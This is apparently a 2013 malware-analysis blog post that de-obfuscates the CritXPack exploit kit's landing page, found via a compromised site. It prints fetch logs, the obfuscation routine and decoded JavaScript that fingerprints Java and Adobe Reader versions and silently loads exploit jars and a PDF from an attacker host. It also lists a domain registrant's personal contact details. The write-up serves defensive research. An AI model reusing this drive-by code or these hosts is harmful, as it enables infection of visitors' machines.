Sunday, January 13, 2013

Some De-obfuscation notes on CritXPack Exploit Kit at root(.)kaovo.com

This is a quick memo of a crusade event, our encounter notes with CritXPack Exploit Kit, I think this will help others, so I dare to make documentation of the findings here as a guide. This is actually based on my memo so please bear the brief & incomplete explanation here and there.
Since we are focusing to the deobfuscation malware codes manually, I'm sorry that the payload information will not be included in this post (considering that the know-how on exploit kit's obfuscation is the target, thus the moronz can change the payload to anything they want anyway).

BTW, capture of the infected(?), I'd say an INFECTOR, site: (clean this up!)
The infector site's domain name is having Chinese registrant data:

Domain Name: kaovo.com
Registrant Contact:
juxiangpin
xiangpin ju bestpa1@hotmail.com
telephone: +86.02088889929
fax: +86.02088889927
kandung jinyang jinyang kandung 800267
CN
OK. Enough for the teaser, we'll make it quick, so here we go:
Starts with the below spam url:
h00p://www.themabbutt.com/index.php?cPath=24
We fetched the index.php:
Resolving www.themabbutt.com... seconds 0.00, 74.200.90.212
Caching www.themabbutt.com => 74.200.90.212
Connecting to www.themabbutt.com|74.200.90.212|:80... seconds 0.00, connected.
  :
GET /index.php?cPath=24 HTTP/1.0
User-Agent: MMD Crusader
Host: www.themabbutt.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Sun, 13 Jan 2013 08:15:02 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_p
assthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Set-Cookie: osCsid=3f7fdcd550948f798d34ba0630c7f8c1; path=/; domain=themabbutt.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
200 OK
Length: unspecified [text/html]
17:15:14 (44.68 KB/s) - `index.php' saved
It has the double obduscation code in the end of the file: ↑Both the the obfuscation code has the same structure below:
// the obfuscation data:

 if(1)
 { f=new Array(9,8,103,99,32,39,98,108,99,116,107,98,110,115,44,100,101,1
   105,101,108,99,107,116,114,64,118,84,96,101,75,97,108,99,37,39,97,109,
   97,139,88,48,92,39,120,13,8,7,6,105,101,112,94,109,100,112,37,41,58,11,
   6,9,124,108,114,99,29,123,12,7,6,9,99,109,96,117,108,99,107,116,45,117,
   :

// and the deobfuscation generator code:

 for(i=0;-i+628!=0;i+=1)
 { j=i;
   if((031==0x19))if(e)s=s+String["fro"+"mCharCode"]((1*w「j」+j%4));  
}
Use the ↑above logic & both obfs code will be burped deobfs code below: The second url will forward you to google, but - the first link's url if we download the source & see the inside, it contains the suspicious link as per below: I fetched it like this:
--17:21:10--  h00p://root.kaovo.com/n121212p/awsxd/i.php?token=speed/
           => `i.php@token=speed%2F'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
  :
GET /n121212p/awsxd/i.php?token=speed/ HTTP/1.0
Referer: h00p://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader Agent
Host: root.kaovo.com
Connection: Keep-Alive
  :
HTTP request sent, awaiting response...
  :
After some "fun" effort receiving 302, finally we received the 1.php
$ ls -alF i.php
-rwx------   xxxx xxxx 2644 Jan 12 21:58 i.php*

MD5: 39583fcb535d2925a5000f4b8deae64a
PS, here's the server's headers:
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
A fail/blocked attempt will pass you to download yandex.ru's cookies:
HTTP/1.1 302 Found
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:21:00 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Location: h00p://www.yandex.ru/robots.txt
Vary: Accept-Encoding

The Landing Page Script

The i.php file contains 2 lines of the obfuscation script. It is the landing page of CritX Exploit Kit Let's make it more "viewable" structure :-) With the below explanation:
1. The pd.js is the PluginDetect 0.7.9 used to guard the pages of this EK. unlike the other EK, it is in seperated download and shared to other infector files. 2. The obfuscation code is found in the script, after passed checks on pd.js, it was a packed script as per shown in line 9. 3. There is a direct download infector in line 14 w/meta refrash tag method. 4. The moronz put the variable used for deobfuscation in other part (line 18).
Let's see the PluginDetect used:
--17:30:05--  h00p://root.kaovo.com/n121212p/awsxd/js/pd.js
           => `pd.js'
Resolving root.kaovo.com... seconds 0.00, 62.76.184.93
Caching root.kaovo.com => 62.76.184.93
Connecting to root.kaovo.com|62.76.184.93|:80... seconds 0.00, connected.
   :
GET /n121212p/awsxd/js/pd.js HTTP/1.0
Referer: http://www.themabbutt.com/index.php?cPath=24
User-Agent: MMD Crusader
Host: root.kaovo.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
   :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.1.14
Date: Sun, 13 Jan 2013 08:29:56 GMT
Content-Type: application/javascript
Content-Length: 28592
Connection: keep-alive
Last-Modified: Thu, 22 Nov 2012 06:59:46 GMT
ETag: "2e0a69-6fb0-4cf1003249c80"
Accept-Ranges: bytes
Vary: Accept-Encoding
  :
200 OK
Length: 28,592 (28K) [application/javascript]
17:30:08 (15.12 KB/s) - `pd.js' saved [28592/28592]
This is the inside, a one line script, hello PluginDetect 0.7.9

Decoding Obfuscation Infector Script

So how to decode the infector part? Let's see the good structure first: It is a simple structure, by feeding the generator by obfuscation data with eliminating garbages/unnecessary code we can get the deobfuscation script saved in the "e" variable here -->>[PASTEBIN] Seeing the codes, we'll see the infector is aiming to check your java version: (by fetching result from PluginDetect 0.7.9)
var GfkghfHqFF9 = (PluginDetect.getVersion("Java") + ".").toString().split(".");
if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 7) && (GfkghfHqFF9[3] < 9)){
  Y9Nmp1nN7 = 7
}
else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] == 6) && (GfkghfHqFF9[3] < 33)){
  Y9Nmp1nN7 = 6
}
else if ((GfkghfHqFF9[0] == 1) && (GfkghfHqFF9[1] < 6)){
  Y9Nmp1nN7 = 5
}
else {
  Y9Nmp1nN7 = 0
And your pdf version (fetching result from PluginDetect 0.7.9)
  var bqeVOXhTg9n = (PluginDetect.getVersion("AdobeReader") + ".")["toString"]().split("."  );
if ((bqeVOXhTg9n[0] == 8) || ((bqeVOXhTg9n[0] == 9) && (bqeVOXhTg9n[1] < 4))){
    selJdFtA = 2
}
  else {
    selJdFtA = 0  }
The return value of 7, 6, 5, 2, 0 was used to trigger jars & PDF exploit file downloads described in the below functions:
// case of return code zero --->// redirected into YANDEX....
if ((selJdFtA == 0) && (Y9Nmp1nN7 == 0) && (b3RSQGB84 == 0)){ 
  document.location.href = "h00p://root.kaovo.com/n121212p/awsxd/jpfoff.php?token=%64%65%66%61%75%6c%74&"
}
if (Y9Nmp1nN7 == 5){ // case of "5" java exploit download
  document.write('
  <div style="visibility:hidden">
  <applet code="a.Test" archive="j15.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXO5" width="1" height="1">
  <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-tApXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
  </applet></div>')
}
if (Y9Nmp1nN7 == 6){ // case of "6" java exploit download
  document.write('
 <div style="visibility:hidden">
 <applet code="a.Test" archive="j16.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYF" width="1" height="1">
 <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-trpXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
 </applet></div>')
}
if (Y9Nmp1nN7 == 7){ // case of "7" java exploit download
  document.write('
  <div style="visibility:hidden">
  <applet code="E" archive="j17.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYl" width="1" height="1">
  <param name="oh" value="dXXOszzHUUX9PFUhU9WULz=#Y#Y#YOzF:BnfzoUFf9OdORiM-SF-r#-1r-r#-t1pXUPi=M-rS-rA-rr-r#-1A-rW-1Sp">
  </applet></div>')
}
if (selJdFtA == 2){ //case of "2" pdf exploit download
  document.write('
  <div style="visibility:hidden">
  <object type="application/pdf" data="lpdf.php?i=cXOYGn5Mc5008McXOY0SFtid0Sd5dSAjAr1fAjrSiFk06riAlWcXOYDF1DF5DFFDFSDl5DFjDl1cXOYxLk&" width="10" height="10">
  </object></div>')}
↑The point is, three jars and a PDF exploit downloads are - the weapon of the current case of CritXPack Exploit Kit. The sample of these script infector are here --->>[MEDIAFIRE] Current infection landing page reference-1 at URLQuery -->>[URLQuery] Current infection's redirector reference-2 at URLQuery -->>[URLQuery] More CritXPack reference at Malware don't need Coffee -->>[HERE] [UPDATED] *) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @MalwareSigs *) RECENT CritXPack Infection URL (regex) in URLQuery 1 -->>[HERE] thx @Set_Abominae
#MalwareMustDie!